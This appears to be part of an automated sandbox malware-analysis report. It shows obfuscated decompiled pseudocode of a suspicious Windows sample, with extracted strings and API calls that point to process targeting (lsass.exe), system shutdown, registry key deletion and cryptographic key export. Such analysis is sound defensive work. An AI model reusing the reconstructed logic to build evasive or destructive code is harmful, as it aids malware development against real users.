                      				if(_t419 <= 0) {
                      					L14:
                      					 *0x509160 = _t311;
                      					 *0x50917a = _t311;
                      				} else {
                      					if(_t132 != 0) {
                      						 *0x50955c =  *0x50955c + _t132;
                      					}
                      					_t180 = "IMCCPHR.exe";
                      					if(_t180 <= _t180) {
                      						_t180 =  &(_t180[0x56]);
                      						goto L14;
                      					}
                      				}
                      				_t365 =  *0x5091ac; // 0xa184
                      				 *0x5091fa = _t365;
                      				 *0x50bf14 = _t132;
                      				if( *(_t459 - 0x24) != 0) {
                      					 *0x509026 =  *0x509026 + _t132;
                      					 *(_t459 - 0xc) =  *(_t459 - 0x4c);
                      					_t340 =  *(_t459 - 0xc);
                      					_t146 =  *(_t459 - 0x1c);
                      					 *(_t459 - 0xc) = _t340;
                      					if(_t340 >= _t340) {
                      						_t340 = 0x7cb6;
                      						 *0x50a6a4 =  *0x50a6a4;
                      						 *0x50bf13 = _t146;
                      						if(_t146 >= 0) {
                      							 *0x50bf15 = _t146;
                      							 *0x50bf17 = _t146;
                      						}
                      					}
                      					if(_t146 <= 0x1bee96) {
                      						 *0x50bf0b =  *0x50bf0b - 0x31255d;
                      					}
                      					_t342 =  *0x509132; // 0xcae6
                      					 *0x50917e = _t342;
                      					_t343 =  *(_t459 - 0xc);
                      					_t386 =  *(_t459 - 0x28);
                      					_t438 = _t386;
                      					if((_t386 & 0x0000a639) == 0) {
                      						 *0x50bf13 = _t146;
                      					}
                      					 *0x50962c =  *0x50962c - _t419;
                      					 *0x509648 =  *0x509648 + _t419;
                      					_t439 = _t438 - _t343;
                      					 *(_t459 - 0xc) = _t343;
                      					 *0x50923a = _t439;
                      					_t389 = _t386;
                      					_t390 =  *_t389;
                      					 *(_t459 - 8) = _t146;
                      					 *0x5091a4 = _t390;
                      					_t147 = _t146 - _t390;
                      					_t392 = _t390;
                      					_t442 =  !(_t439 - _t390 - 0x90d236);
                      					if(0x8a45 <= 0) {
                      						 *0x50b616 =  *0x50b616 - _t442;
                      						_t419 = _t419 - 0xe198;
                      						 *0x50bf17 = 0xbd;
                      						_t156 =  *0x5096f8; // 0x0
                      						_t147 = _t156 + 0x00000001 | 0x0000002e;
                      					}
                      					_t248 =  *0x509c8c; // 0x0
                      					_push(_t392);
                      					if((_t392 & 0x007d7b2e) <= 0) {
                      						 *0x50bf13 = _t147;
                      						_t147 = 0xd6;
                      					}
                      					_pop(_t393);
                      					_t395 = _t393;
                      					_t132 =  *(_t459 - 8);
                      					_t443 = _t132;
                      					_t399 = _t395 + _t443;
                      					_t350 =  *(_t459 - 0xc);
                      					 *(_t459 - 0x40) = _t350;
                      					_t251 = _t248 - _t132 - 0xf3;
                      					 *0x50bf17 = _t132;
                      					if(_t132 < 0xb19) {
                      						L31:
                      						 *0x50bf12 = _t132;
                      						_t252 = _t251 - _t132;
                      						goto L32;
                      					} else {
                      						_t252 =  *(_t459 - 8);
                      						 *0x50bf0c =  *0x50bf0c - _t252;
                      						 *0x50910a =  *0x50910a + _t252;
                      						if(0 <= 0) {
                      							L32:
                      							 *0x50bf15 = _t132;
                      							 *0x5096b4 = _t132;
                      							_t257 =  *0x509900; // 0x0
                      							_t258 = _t257 - 0x2bae;
                      							 *0x5090be =  *0x5090be + _t258;
                      							 *(_t459 - 8) = _t258;
                      							 *0x50bf0e =  *0x50bf0e + _t350;
                      							 *0x509172 = _t350;
                      							_push( *(_t459 - 0x40));
                      							if((_t399 & 0x0099410e) < 0) {
                      							}
                      							 *0x50bf17 = _t132;
                      							 *(_t459 - 0xc) = _t350;
                      							_t400 = _t399 - 0x7de7e5;
                      							 *0x50bf11 =  *0x50bf11 - _t400;
                      							 *0x509214 = _t400;
                      							 *0x50bf07 = _t132;
                      							_t352 =  *(_t459 - 0xc);
                      							_t401 = _t399;
                      							 *(_t459 - 0x44) = _t401;
                      							_t452 =  *0x5091ce; // 0x6d91
                      							_push(_t401);
                      							if((_t452 - 0x00009e3d & 0x0000ae02) <= 0) {
                      								L40:
                      								 *0x509152 = _t352;
                      								_t401 = _t352;
                      								goto L41;
                      							} else {
                      								if(_t132 > 0) {
                      									 *0x50bf15 = _t132;
                      								}
                      								if(_t132 > 0x8811c) {
                      									L41:
                      									goto L42;
                      								} else {
                      									if(0xf9 + _t132 - 0xfffffffffffffff8 != 0x31) {
                      										L42:
                      										_pop(_t405);
                      										_push( *(_t459 - 0x44));
                      										_t419 = 0xeaff;
                      										if(_t132 != 3) {
                      											 *0x509040 =  *0x509040 + _t132;
                      										}
                      										 *(_t459 - 8) = 0x34ce68;
                      										 *(_t459 - 0xc) = _t352;
                      										_t311 = 0x624c;
                      										 *(_t459 - 8) = _t132;
                      										_push(E004E881B);
                      										goto __ebx;
                      									}
                      									goto L40;
                      								}
                      							}
                      						}
                      						 *0x5091a2 = _t399;
                      						goto L31;
                      					}
                      				}
                      				 *0x50921e = 0;
                      				_t435 = 0xfffffffffffe68cf;
                      				 *(_t459 - 8) = _t132;
                      				 *(_t459 - 0xc) = _t311;
                      				_t314 = 0x73c4;
                      				_t134 =  *(_t459 - 8);
                      				if(0x3031ff < 0x3031ff) {
                      					_t314 = 0x5d28;
                      					 *0x50bf0f =  *0x50bf0f + 0x5d28;
                      					 *0x50917a = 0x5d28;
                      				}
                      				_t368 =  *0x5091ac; // 0xa184
                      				 *0x5091fc = _t368;
                      				if( *(_t459 - 0x20) != 0xffffffff) {
                      					 *(_t459 - 0xc) =  *(_t459 - 0xc) + _t314;
                      					 *(_t459 - 8) = _t134;
                      					 *0x50919c = 0;
                      					_t137 =  *(_t459 - 0x20);
                      					if(0 < 0) {
                      						L53:
                      						 *0x50bf17 = _t137;
                      					} else {
                      						 *0x50bf12 =  *0x50bf12 - _t137;
                      						 *0x509260 =  *0x509260 + _t435;
                      						if(_t435 >= 0) {
                      							goto L53;
                      						}
                      					}
                      					 *0x509060 =  *0x509060 + _t137;
                      					 *0x50bf0b =  *0x50bf0b + 0x37175f;
                      					 *(_t459 - 0xc) =  *(_t459 - 0xc) + 0x6cbb;
                      					 *0x509192 = 0x6cbb;
                      					_t371 = 0xffffffffffffff6a;
                      					 *0x5091fc =  *0x5091fc;
                      					 *0x509212 = 0;
                      					_t436 = 0;
                      					_t322 =  *(_t459 - 0x30);
                      					if(_t419 != 0) {
                      						L62:
                      						 *0x50916c = _t322;
                      						_t373 =  *0x50919e; // 0x70ff
                      						 *0x5091ea = _t373;
                      						_t371 = 0;
                      					} else {
                      						if(_t419 > 0) {
                      							L60:
                      							 *0x509038 =  *0x509038 - _t137;
                      							_t221 = 0x24b035;
                      							goto L61;
                      						} else {
                      							if(_t137 <= 0x159bd2) {
                      								if(_t137 >= 0x27dc) {
                      									goto L60;
                      								} else {
                      									 *0x5090e4 =  *0x5090e4 + 0x38f71d;
                      									 *0x50919a = 0x66f0;
                      									_t221 = _t137 - _t137;
                      									_t436 = (0 >> _t322) - 0xb83fc5;
                      									 *0x50bf15 = _t137;
                      									if(0 != 0) {
                      										goto L60;
                      									}
                      								}
                      								L61:
                      								 *0x5090b4 =  *0x5090b4 - _t221;
                      								goto L62;
                      							}
                      						}
                      					}
                      					_t374 = _t371 - 0xaef1;
                      					if(_t137 <=  *((intOrPtr*)(_t322 + 0x14))) {
                      						_t199 =  *0x50bf15; // 0x0
                      						 *(_t459 - 8) = _t137;
                      						 *0x509144 =  *0x509144 - _t322 + 0x52c6ce;
                      						E004AA87F( *(_t459 - 8), (_t199 - 0xf5 >> _t322) + 0x44a24a - 0x35ea, _t436);
                      						_t140 =  *(_t459 - 8);
                      						_t325 = 0;
                      						 *(_t459 - 8) = _t140;
                      						_t205 = "WSManHTTPConfig.exe";
                      						if(_t205 != _t205) {
                      							L69:
                      							 *0x50bf07 = _t140;
                      							if(_t140 <= 0xaca) {
                      								L73:
                      								 *0x509124 =  *0x509124 - _t325;
                      								 *0x50bf0e =  *0x50bf0e + _t325;
                      								_t142 =  *(_t459 - 0x1c);
                      								 *0x50bf12 = _t142;
                      								 *(_t459 - 8) = _t142;
                      								 *0x509ed4 =  *0x509ed4 - "RegDeleteKeyExW";
                      								 *0x50bf0f =  *0x50bf0f + _t325 - 0x5a45c7;
                      								_push(1);
                      								_push(0);
                      								_push(0x4e8fbf);
                      								goto __edx;
                      							}
                      							if(_t140 != 0x1b) {
                      								 *0x509b00 =  *0x509b00 + _t205;
                      							}
                      							goto L73;
                      						}
                      						_t205 =  *(_t459 - 0xc);
                      						 *0x509184 = 0xffffffffffa979b5;
                      						_t325 = 0 + _t374;
                      						_t374 =  *0x5091b6; // 0xc472
                      						if((_t374 & 0x00008fc7) < 0 || (_t374 & 0x008f185d) < 0) {
                      							_t374 = _t374 + _t436;
                      							_t143 =  *0x50bf13; // -9
                      							 *0x50bf14 = _t143;
                      							_t140 = 0xf2;
                      							goto L69;
                      						} else {
                      							goto L73;
                      						}
                      					}
                      					 *(_t459 - 8) = _t137;
                      					_push(0x7f);
                      					 *0x50919a = _t374;
                      					 *(_t459 - 0xc) = _t322;
                      					_t145 =  *(_t459 - 8);
                      					 *0x5099c8 = _t145;
                      					 *0x50911e = _t322 ^ 0x00000079;
                      					_push(E004E8E38);
                      					_push( *0x5098c8);
                      					return _t145;
                      				} else {
                      					if(0 < 0) {
                      						_t314 = 0x6262;
                      					}
                      					 *0x50915a = _t314;
                      					_push(0x7f);
                      					 *(_t459 - 8) = _t134;
                      					 *0x509db0 = 0x36c119;
                      					_push(0);
                      					_push(E004E8B54);
                      					_push(E004C4A3C);
                      					return _t134;
                      				}
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: CNBP_335.DLL$Dz<$G`}$IMCCPHR.exe$InitiateSystemShutdownExA$NtPowerInformation$OSProvider.dll$R`?$RegDeleteKeyExW$SDQ$System.Net.Primitives.dll$System.Xml.XmlDocument.dll$WSManHTTPConfig.exe$]%1$^%.$normaliz.dll$ucmhc.dll$F
                      • API String ID: 0-2272826359
                      • Opcode ID: bdb1da670e0fa0c0739ec1282394688ee78361344f1acaddfe6a516f6012855f
                      • Instruction ID: dc5b59073ecc3be7054bf4352d6e77e3895222791f7adda92deaf7d2b7672475
                      • Opcode Fuzzy Hash: bdb1da670e0fa0c0739ec1282394688ee78361344f1acaddfe6a516f6012855f
                      • Instruction Fuzzy Hash: 6E32F175E043869FCB00DFB9EC986CD7BB1EB79320B08856EC85897366D3380949EB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CryptExportKey.ADVAPI32(?,?,00000006), ref: 004B7071
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CryptExport
                      • String ID: CoLockObjectExternal$G.V$InitiateSystemShutdownExA$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$System.Xml.XmlDocument.dll$WFServicesReg.exe$WSManHTTPConfig.exe$activeds.dll$dpnet.dll$lsass.exe$networkitemfactory.dll$ucmhc.dll
                      • API String ID: 3389274496-1735128682
                      • Opcode ID: 9300edce1c6eaca630131e32320873dc04e76a50b5040fb8c82b62c68c755605
                      • Instruction ID: 49f11683c70a56330a9b0513da23aa4333476cfe196987f9c1bb4bbcbd2c33fa
                      • Opcode Fuzzy Hash: 9300edce1c6eaca630131e32320873dc04e76a50b5040fb8c82b62c68c755605
                      • Instruction Fuzzy Hash: 4FA19B75F443069BDB00DFB9E8D86CE7BB0FB39320F44406AD844A7366E2780A49DB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 15%
                      			E004B3784(void* __ecx, void* __edx, signed int __edi, unsigned short __esi) {
                      				int _t37;
                      				int _t45;
                      				int _t60;
                      				intOrPtr _t105;
                      				void* _t107;
                      				void* _t120;
                      				signed char _t123;
                      				intOrPtr _t125;
                      				short _t127;
                      				void* _t128;
                      				signed int _t129;
                      				unsigned short _t132;
                      				unsigned short _t133;
                      				unsigned short _t134;
                      				void* _t137;
                      
                      				_t132 = __esi;
                      				_t129 = __edi;
                      				_t107 = __edx;
                      				_t37 =  *(_t137 - 8);
                      				if(_t37 <= 0x19509d) {
                      					 *((intOrPtr*)(_t137 - 0x14)) =  *((intOrPtr*)(_t137 - 0x14)) - 0x2e8764;
                      					 *((intOrPtr*)(_t137 - 0x14)) =  *((intOrPtr*)(_t137 - 0x14)) - 0x2e8764;
                      				}
                      				 *(_t137 - 8) = _t37;
                      				_push( *((intOrPtr*)(_t137 - 0x4c)));
                      				 *0x5091cc = _t107 - 1;
                      				if("lsass.exe" <= 0x24225c) {
                      					 *0x5090e6 =  *0x5090e6 - 0x395923;
                      					 *0x509100 =  *0x509100 - 0x395923;
                      				}
                      				_t45 = CryptDecrypt();
                      				_t133 = _t132 >> 0x7722;
                      				if(_t45 < 0) {
                      					_t129 = _t129 >> 0x7722;
                      					if(0x5090b8 > 0x5090b8) {
                      					}
                      				}
                      				_t102 = 0x7156;
                      				 *((intOrPtr*)(_t137 - 0x24)) =  *((intOrPtr*)(_t137 - 0x24)) - 0x7156;
                      				 *0x5091a2 =  *0x5091a2;
                      				 *0x50bf12 =  *0x50bf12 - _t45;
                      				 *0x50ace0 =  *0x50ace0 + _t133;
                      				_t68 = 0xd3;
                      				 *0x50ba1b =  *0x50ba1b - _t129;
                      				if(_t45 != 0) {
                      					 *(_t137 - 8) = _t45;
                      					if(_t45 <= 0x21bf76) {
                      						 *0x50bf0b =  *0x50bf0b - 0xd3;
                      						 *0x5090de =  *0x5090de + 0xd3;
                      						_t68 = 0x1a6;
                      						_t102 =  *0x50912e; // 0x9c03
                      						if(_t102 < _t102) {
                      							 *0x50bf0f =  *0x50bf0f + _t102;
                      						}
                      						 *0x509192 = _t102;
                      					}
                      					_t123 = 0x9402;
                      					 *0x5091fc =  *0x5091fc + 0x9402;
                      					 *0x509212 =  *0x509212 - 0x9402;
                      					_t134 = _t133 + 0xbb6e;
                      					_t129 = _t129 >> _t102;
                      					_t60 =  *(_t137 + 0xc);
                      					if(_t129 != 0) {
                      						L16:
                      						_t102 = _t102 + _t102;
                      						if((_t123 & 0x00000081) <= 0) {
                      							L18:
                      							_t129 = _t129 + _t129 + 0xe5fd;
                      							 *0x50bf17 = _t60;
                      							_t68 = 0;
                      							goto L19;
                      						}
                      						 *0x5091ea = _t123;
                      						_t123 =  *0x50923a; // 0x9678
                      						_t68 = 0xba;
                      						if(_t134 == 0) {
                      							goto L21;
                      						}
                      						goto L18;
                      					} else {
                      						_t129 = _t129 | 0x00000157;
                      						if(_t60 >= 0x11) {
                      							L19:
                      							 *(_t137 - 0xc) =  *(_t137 - 0xc) - _t60;
                      							 *(_t137 - 0xc) = _t60;
                      							_t68 = 0xffffffffffbe3805;
                      							if(0xffffffffffbe3805 > 0xffffffffffbe3805) {
                      								L22:
                      								_t125 =  *((intOrPtr*)(_t137 - 0x54));
                      								 *(_t137 - 8) = _t60;
                      								_t61 = 0x204c6f;
                      								 *(_t137 - 0xc) = _t68;
                      								if(_t68 != 0x3c) {
                      									_t68 = 0x43a7ba;
                      									 *0x50910c =  *0x50910c + 0x43a7ba;
                      									 *0x509128 = _t102;
                      									_t105 =  *0x509176; // 0x6328
                      									_t102 = _t105 - 0x7abd;
                      									_t134 = (_t134 >> _t105 - 0x7abd) + _t125 - 0xa229;
                      									_t61 = 0x204bc2;
                      								}
                      								 *0x50bf11 =  *0x50bf11 - _t125 - 0x7d29ab;
                      								_t127 = _t125;
                      								_t133 = _t134;
                      								 *0x5091e0 = _t127;
                      								_t128 = _t127;
                      								_t45 = _t61;
                      								_push(_t128);
                      								_push(_t128);
                      								_push(_t128);
                      								_push(E004B39E7);
                      								goto __edx;
                      							}
                      							 *0x509122 = _t102;
                      							_t102 = 0x78a6;
                      							L21:
                      							_t102 =  !_t102;
                      							 *0x5091b6 = _t123;
                      							goto L22;
                      						}
                      						 *0x50bf0e =  *0x50bf0e - _t102;
                      						 *0x509152 =  *0x509152 + _t102;
                      						goto L16;
                      					}
                      				}
                      				_push(0xa0a5);
                      				 *(_t137 - 8) = _t45;
                      				 *0x50bf0a =  *0x50bf0a - 0x1d6660;
                      				E004AE40E(L00468BBD(0x1d6660, 0xa97a), 0x4df650, 0x7156, 0xa97a, _t129, _t133, 0);
                      				 *0x50911c = 0x7156;
                      				 *0x50a5f0 =  *0x50a5f0 - 0xa97a;
                      				_t120 = 0x4df650;
                      				_push( *((intOrPtr*)(_t137 - 0x4c)));
                      				_push(_t120);
                      				_push(E004B3AC3);
                      				_push( *0x509e54);
                      				return  *(_t137 - 8);
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CryptDecrypt
                      • String ID: #Y9$CNBP_335.DLL$G.V$G`}$InitiateSystemShutdownExA$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$lsass.exe$oL
                      • API String ID: 2620231605-704947606
                      • Opcode ID: 6434e06d8e2f77a5c8e9e61d83859d8f0ce36a643290fb73e34a3d9c6789f362
                      • Instruction ID: b4209656af4d54c3d9107a49bb6476fbf9b0fe48bea1afd19b879d6c667ccbf1
                      • Opcode Fuzzy Hash: 6434e06d8e2f77a5c8e9e61d83859d8f0ce36a643290fb73e34a3d9c6789f362
                      • Instruction Fuzzy Hash: F17123B5A003069BDB00DF7AEC996CD7BB1FB79710B08842AD844E3726E3780A49DB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CryptExportKey.ADVAPI32(?,?,00000006), ref: 004B766A
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CryptExport
                      • String ID: CNBP_335.DLL$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$OSProvider.dll$TpCaptureCaller$dpnet.dll$mscpxl32.dLL$ucmhc.dll
                      • API String ID: 3389274496-2979050597
                      • Opcode ID: b1443d7df1f858678b58b9b46ba6ac197c3bb39f4cc6b54cf82becf211e7e70a
                      • Instruction ID: 6886079a854f876adbd4c64abd0be54fa4248196f95f431457090f5f8f0370e2
                      • Opcode Fuzzy Hash: b1443d7df1f858678b58b9b46ba6ac197c3bb39f4cc6b54cf82becf211e7e70a
                      • Instruction Fuzzy Hash: EB81C179F047069FDB00DF79D8882DDBBB0FB79320B04426AD919A7366E3780949DB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CryptBinaryToStringA.CRYPT32(?,?,000000F9,00000001,00000005), ref: 004AE87B
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID: CNBP_335.DLL$IMCCPHR.exe$InitiateSystemShutdownExA$NtSetDriverEntryOrder$WSManHTTPConfig.exe$aaclient.dll$api-ms-win-core-localization-l1-1-0.dll
                      • API String ID: 80407269-1064507877
                      • Opcode ID: beca1dc9563e04e00d3e033c5248c1603fedfa57e486cb6f9ffce0518a3d04e2
                      • Instruction ID: 30d49ceb3d958b7dda6f694fb9283b2203df418664f1ff30a4c02545ae22b7ba
                      • Opcode Fuzzy Hash: beca1dc9563e04e00d3e033c5248c1603fedfa57e486cb6f9ffce0518a3d04e2
                      • Instruction Fuzzy Hash: D0517B7AA143434BD700EF79ED992CE3BB1EB36320B44492ADC50D7767E328450ADB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • CryptExportKey.ADVAPI32(?,951A17BA,00000007,00000000,00000000), ref: 004B6650
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CryptExport
                      • String ID: CNBP_335.DLL$G.V$G`}$HMETAFILEPICT_UserSize$NtSetDriverEntryOrder$lsass.exe$mscpxl32.dLL
                      • API String ID: 3389274496-1499778608
                      • Opcode ID: ab59ec86f3bf80186bc6f0937e7e324a2b1a3822996b58765c4cd5be6d63eaa3
                      • Instruction ID: e32ce7c38ba0493268d5b62a4cfcce870fcd447c92f23e19ee35de79477fa7bd
                      • Opcode Fuzzy Hash: ab59ec86f3bf80186bc6f0937e7e324a2b1a3822996b58765c4cd5be6d63eaa3
                      • Instruction Fuzzy Hash: 9A51E071F042069BDB00EFB9EC982CE7BB1EB39310F49857A9844D7756E2790A48DB40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 34%
                      			E0046A04E(intOrPtr __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                      				char _t54;
                      				intOrPtr _t69;
                      				intOrPtr _t88;
                      				intOrPtr _t92;
                      				char* _t98;
                      				unsigned short _t113;
                      				intOrPtr _t118;
                      				void* _t142;
                      				signed char _t148;
                      				void* _t153;
                      				short _t157;
                      				intOrPtr _t161;
                      				short _t163;
                      				void* _t167;
                      				void* _t169;
                      				void* _t177;
                      
                      				_t167 = __edi;
                      				 *((intOrPtr*)(_t177 - 8)) = __eax;
                      				 *0x50912c = __ecx - 0x588823;
                      				_t98 = 0x370c96;
                      				_t54 =  *((intOrPtr*)(_t177 - 8));
                      				 *0x5090fa =  *0x5090fa - 0x370c96;
                      				_t142 = 0xffffffffffacaa61;
                      				_push(0);
                      				_t157 = 0xacce;
                      				 *0x50bf13 = _t54;
                      				if(_t54 == 0) {
                      					L2:
                      					_t142 = 0x6ec6;
                      					if(0x6ec6 == 0x6ec6) {
                      						_t157 = 0xa1;
                      						 *0x50bf12 =  *0x50bf12 - 0xa1;
                      						_t98 =  *0x50bf14; // 0x0
                      					}
                      					L4:
                      					 *0x50bf15 = _t54;
                      					_push( *0x50901a);
                      					 *0x50bf17 = _t54;
                      					_t169 = _t167 - 0xedf8 + _t54;
                      					if(_t54 < 0x105e86) {
                      						if(_t54 < 0x1a22) {
                      							 *(_t177 - 0x10) = _t98;
                      						}
                      						 *((intOrPtr*)(_t177 - 0x20)) =  *((intOrPtr*)(_t177 - 0x20)) - _t142;
                      					}
                      					 *0x5091ba = _t157;
                      					 *0x50bf13 = _t54;
                      					 *0x50ba0b =  *0x50ba0b - _t169;
                      					_t170 = _t169 + _t169;
                      					if(_t169 + _t169 == 0) {
                      						 *((intOrPtr*)(_t177 - 8)) = _t54;
                      						 *((intOrPtr*)(_t177 - 0xc)) = _t54;
                      					}
                      					_t99 = 0x2d976e;
                      					if(0x2d976e >= 0x3ab7) {
                      						_t99 = 0xa3c23;
                      					}
                      					_push( *0x5090b6);
                      					 *((intOrPtr*)(_t177 - 8)) = _t54;
                      					L00469469(_t99, _t170, 0xffffffffffff3086, "dpnet.dll");
                      					 *(_t177 - 0x1c) =  *(_t177 - 0x1c) - 0x3d9bb1;
                      					 *0x50bf0e =  *0x50bf0e + 0x6c1d;
                      					 *0x509146 =  *0x509146 + 0x6c1d;
                      					 *(_t177 - 0x10) = "api-ms-win-core-localization-l1-1-0.dll";
                      					_push( *0x50908c);
                      					 *0x50916a = 0x6c1d;
                      					_t161 =  *0x50919c; // 0xfa7f
                      					 *0x5091ce =  *0x5091ce - _t161;
                      					 *0x5091ea =  *0x5091ea - _t161;
                      					_t163 = _t161 + _t161 + 0x9c58ab;
                      					L00468D9F(0x415b2d, _t163, _t170, 0xffffffffffff3086, 1,  *((intOrPtr*)(_t177 - 8)));
                      					E00466493(0xffffffffffffffd5, 0x415b2d, 0xd83a, _t170, 0xffffffffffff3086, 1, 0);
                      					_t69 =  *((intOrPtr*)(_t177 - 8));
                      					_push( *0x50908c);
                      					 *0x50bf0e =  *0x50bf0e + 0xd83a;
                      					if(0xd83a > 0xd83a) {
                      						 *0x5091d8 = _t163;
                      						_t163 =  *0x50920c; // 0xe35a
                      						 *0x509242 =  *0x509242 - 0xffffffffffff3086;
                      					}
                      					 *((intOrPtr*)(_t177 - 8)) = _t69;
                      					 *((intOrPtr*)(_t177 - 0xc)) = _t69;
                      					 *(_t177 - 0x1c) = 0x776173;
                      					_t148 =  *0x50912c; // 0x5d7b
                      					_push( *0x50912a);
                      					_t74 =  *((intOrPtr*)(_t177 - 8));
                      					 *0x5090fc =  *0x5090fc - 0x3ef847;
                      					_t113 = 0x3ef847 - _t148;
                      					E00469D4E( *((intOrPtr*)(_t177 - 8)), _t113, _t148, _t170,  *((intOrPtr*)(_t177 - 8)), _t74);
                      					 *0x50bf0b =  *0x50bf0b - _t113;
                      					_push( *0x50908c);
                      					E0046624A("_isdel.exe", 0x60ff, _t163, _t170, 0xfffffffffffe610c, (_t113 >> _t148) + (_t113 >> _t148) + (_t113 >> _t148) + (_t113 >> _t148));
                      					_t118 = 0x49ca06;
                      					 *0x509124 =  *0x509124 - 0x60ff;
                      					_push( *0x509006);
                      					_t88 =  *((intOrPtr*)(_t177 - 8));
                      					if(0 < 0x2e) {
                      						_t118 = "RegDeleteKeyExW" + "RegDeleteKeyExW";
                      					}
                      					_t153 = 0x6d0f;
                      					 *((intOrPtr*)(_t177 - 8)) = _t88;
                      					E00469D4E(E00466493(_t88, _t118, 0x6d0f, _t170, 0xfffffffffffe610c, 1, _t88), _t118, 0x6d0f, _t170, 0, 1);
                      					_t92 =  *((intOrPtr*)(_t177 - 8));
                      					 *((intOrPtr*)(_t177 - 0x18)) = _t118;
                      					_push( *0x5090f0);
                      					 *((intOrPtr*)(_t177 - 8)) = _t92;
                      					if(_t92 > 0x19) {
                      						_t92 = _t92 + 0x24fbb3;
                      						 *(_t177 - 0x1c) = "WSManHTTPConfig.exe";
                      						_t153 = 0x684f;
                      					}
                      					_push(_t153);
                      					_push(E0046A3CE);
                      					_push(E0046624A);
                      					return _t92;
                      				}
                      				 *0x50bcf7 =  *0x50bcf7 + __edi;
                      				 *0x50bf17 = _t54;
                      				_t98 = "normaliz.dll" - _t54 + "normaliz.dll" - _t54 + 0x40;
                      				if(_t98 != _t98) {
                      					goto L4;
                      				}
                      				goto L2;
                      			}




















                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID:
                      • String ID: #<$7.*$8 3$NtSetDriverEntryOrder$RegDeleteKeyExW$WSManHTTPConfig.exe$_isdel.exe$api-ms-win-core-localization-l1-1-0.dll$dpnet.dll$normaliz.dll$wuapi.dll
                      • API String ID: 0-2822638380
                      • Opcode ID: 29b41a23ed16ee31f4bc53995089e234d087008fac45b77517d481f4c27606a3
                      • Instruction ID: 247ef8051ac71f791f4d65835295639385eaa012c00a6ce7a54dd0cbe1e3d3b3
                      • Opcode Fuzzy Hash: 29b41a23ed16ee31f4bc53995089e234d087008fac45b77517d481f4c27606a3
                      • Instruction Fuzzy Hash: 1691B075B003069BDB00EFB9ECE56DD7BB0EB29310F04447AE984E7756E2740A85CB56
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 49%
                      			E004AEBD6() {
                      				void* _t38;
                      				intOrPtr _t42;
                      				char _t44;
                      				char* _t71;
                      				char* _t75;
                      				char* _t77;
                      				void* _t79;
                      				void* _t80;
                      				void* _t85;
                      				signed char _t86;
                      				short _t88;
                      				void* _t96;
                      				short _t97;
                      				signed char _t100;
                      				short _t102;
                      				void* _t106;
                      				void* _t111;
                      				unsigned short _t112;
                      				unsigned short _t113;
                      				void* _t116;
                      
                      				_t97 = _t96 - 0x91df4e;
                      				_t28 = "InitiateSystemShutdownExA";
                      				if("InitiateSystemShutdownExA" != 0x138686) {
                      					L3:
                      					_t85 = _t85 + _t85;
                      					_t97 = 0x8c09;
                      					 *0x509212 = 0x8c09;
                      					L4:
                      					_push(1);
                      					L00468D9F(0x56, _t97, _t106, _t111, _t28 - 0xbe, 1);
                      					_push(0);
                      					_t86 = _t85 + 0x79;
                      					 *0x5091d2 = _t97;
                      					_t88 = _t86 + _t86 + 0x68cb;
                      					_t100 = 0x9819;
                      					_push(0);
                      					_push("WFServicesReg.exe");
                      					E004A800F();
                      					 *(_t116 - 0x10) = 0x41b390 >> _t86;
